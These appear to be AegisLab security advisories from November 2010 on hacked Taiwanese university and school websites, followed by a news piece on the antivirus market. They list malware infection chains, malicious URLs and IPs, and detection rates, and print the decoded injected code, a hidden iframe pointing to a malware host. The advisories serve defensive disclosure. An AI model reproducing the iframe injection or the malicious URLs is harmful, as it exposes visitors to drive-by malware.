[ 安全通報 ] 24 十一月, 2010 10:29

AegisLab 於昨日發現東華大學數學系首頁遭殖入病毒, 目前網頁尚未修復 。

§ 感染途徑:
[root] hxxp://www.math.ndhu.edu.tw/  (PageRank: 4)
 [virus] hxxp://secure.manualstats20.com/images/5d31b7e88247f0b2f4663ec104293815.php?u=47&s=56179768&c=d&

   首頁網頁下方被植入一段 Javascript 代碼, 如下圖:

    經過解碼後, 原本的代碼為:

     這段程式碼執行後會將 <iframe src='http://secure.manualstats20.com/images/d' width='10' height='10' style='visibility: hidden;></iframe> 這段HTML插到原本的網頁之中。


§ Anti-Virus
  * 該病毒於 VirusTotal 的偵測率: 14 /43 (32.6%)
  ( http://www.virustotal.com/file-scan/report.html?id=7d6db256e13677c44fcc80ebc1d60b8cac08b98b4bb9766e2733fac70d902fdf-1290470915 )

§ URL filter
  * 該病毒下載網址在URLvoid的偵測率: 1/17 (6 %)
( http://www.urlvoid.com/scan/secure.manualstats20.com )
  * WebGuard 自 2010-11-22起阻擋該下載網址。

[ 安全通報 ] 09 十一月, 2010 10:25
    自從上次在七月發現"文雅E學園"被殖入至少大量 SEO poison網頁後,今天再次發 現遭入侵,殖入的 hopping site 是"77.78.247.175",目前尚未有url filter阻 擋,最後下載fakeAV 檔案的掃毒率依舊相當低 (16%)。

§ 感染途徑:
[search] http://www.google.com 搜尋petit murders
 [root] hxxp://moodle.wyes.tcc.edu.tw/moodle/k/w/2086161388.php
  [hopping]hxxp://77.78.247.175/index.php?wci...
   [script] hxxp://77.78.247.217/index.php?EB=07...
    [virus] hxxp://77.78.247.217/index.php?85K7=z3qbX

§ Anti-Virus
    * 該下載病毒於 VirusTotal 的偵測率: 7/42 (16.7%)
   ( http://www.virustotal.com/file-scan/report.html?id=c4df34669ed6a6c136e50a36bf0428075cbe369d0eab7de077a384fc7b203991-1289267295)

§ URL filter
  * 目前該hopping site的偵測率: 0/6 (0.0%)

(http://www.virustotal.com/url-scan/report.html?id=a83ce54f73db7e5cf88b7a9d520991c4-1289263966
  * AegisLab WebGuard 自 2010-11-09 起阻擋該hopping site。
[ 新聞 ] 08 十一月, 2010 15:55

網路重資安 流氓木馬橫行是危機也是商機

  • 2010-11-08
  • 新聞速報
  • 【中廣新聞/彭清仁】

    高階智慧手機大行其道,更讓許多資安大廠,看到資訊防護的龐大商機!尤其目前最夯的ANDROID系統平台的手機,已出現 病毒。業者指出,傳統的防毒軟體是用來殺病毒的,但木馬和流氓軟體卻不是病毒,因此不在防護範圍內。而且愈來愈多的資安業者強調,防 毒是在病毒進入網路之前就要攔截,和傳統的在電腦中找病毒的方式大不相同。

    據研究機構指出,大陸是全球最大的網路市場,光是防毒軟體今年的市場規模就達到兩百廿多億人民幣,未來三到五年,大陸市場 防毒軟體的市場規模可望達到一百億美元。再看到目前全球最夯的高階智慧手機大行其道,但ANDROID系統的手機,已出現病毒,雖然 業界對負面消息都相當低調,但另一頭的資安系統公司,卻是暗自竊喜,因為背後龐大的商機,卻是資安業者所樂於見到的。

    據竹科鴻璟科技董事長呂炳標指出,安全防護不管是高階手機或是網路,只要出現病毒,防毒業者都會提供免費下載來因應,但傳 統的防毒軟體是殺病毒,不過目前最讓電腦使用者困擾的是木馬和所謂的流氓軟體,並非是病毒,因此並不在防護的範圍內,卻往往能侵入電 腦的個人資料。而消費者面對各種防毒軟體也無所適從,但站在資安業者的角度,最佳的防護方式,就是在病毒還沒進入網路之前就成功攔 下,而關鍵的技術,就是在於病毒碼的建立,讓防護晶片或軟體提早將病毒攔下。呂炳標也不諱言的表示,資安業者看到龐大的商機,但業者 間除了搶市場之外,當然也比技術,而台灣在防毒技術上,絲毫不遜於世界大廠,欠缺的只是如何將技術露出。